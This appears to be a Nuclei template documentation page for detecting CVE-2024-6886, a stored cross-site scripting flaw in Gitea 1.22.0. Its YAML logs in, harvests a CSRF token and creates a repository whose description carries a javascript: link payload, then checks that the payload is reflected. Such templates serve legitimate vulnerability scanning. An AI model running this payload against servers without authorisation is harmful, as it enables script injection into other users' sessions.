Skip to content
Nuclei Templates

Gitea 1.22.0 - Cross-Site Scripting

ID: CVE-2024-6886

Severity: medium

Author: soonghee2

Tags: cve,cve2024,gitea,xss,authenticated

Description

Section titled “Description”

Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user’s session.

YAML Source

Section titled “YAML Source”
id: CVE-2024-6886


info:
  name: Gitea 1.22.0 - Cross-Site Scripting
  author: soonghee2
  severity: medium
  description: |
    Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.
  reference:
    - https://www.exploit-db.com/exploits/52077
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6886
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:L
    cvss-score: 6.7
    cve-id: CVE-2024-6886
    cwe-id: CWE-79
    cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: gitea
    product: gitea
  tags: cve,cve2024,gitea,xss,authenticated


variables:
  username: "{{username}}"
  password: "{{password}}"


http:
  - raw:
      - |
        POST /user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        user_name={{username}}&password={{password}}


      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


      - |
        GET /{{username}} HTTP/1.1
        Host: {{Hostname}}


      - |
        POST /repo/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        repo_name={{randstr}}&description=<a%20href="javascript:alert(document.domain)">XSS</a>&_csrf={{csrf_token}}&uid={{uid_name}}


      - |
        GET /{{username}} HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body_5
        words:
          - '<a href="javascript:alert(document.domain)">XSS</a>'
          - 'gitea'
        condition: and


      - type: word
        part: header_5
        words:
          - text/html


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        name: csrf_token
        group: 1
        regex:
          - 'name="_csrf" value="([^"]+)"'
        internal: true


      - type: regex
        name: uid_name
        group: 1
        regex:
          - '"uid":\s*(\d+)'
        internal: true
# digest: 490a004630440220794850ade0257c0152689ca885f4dbf63a12718c240bc3df0d687cd8f5efc67b02201bc744cb87251732dd1d821fa90deae70314ac6c68ed6f2dd6b1ffd759d46c1a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-6886.yaml"

View on Github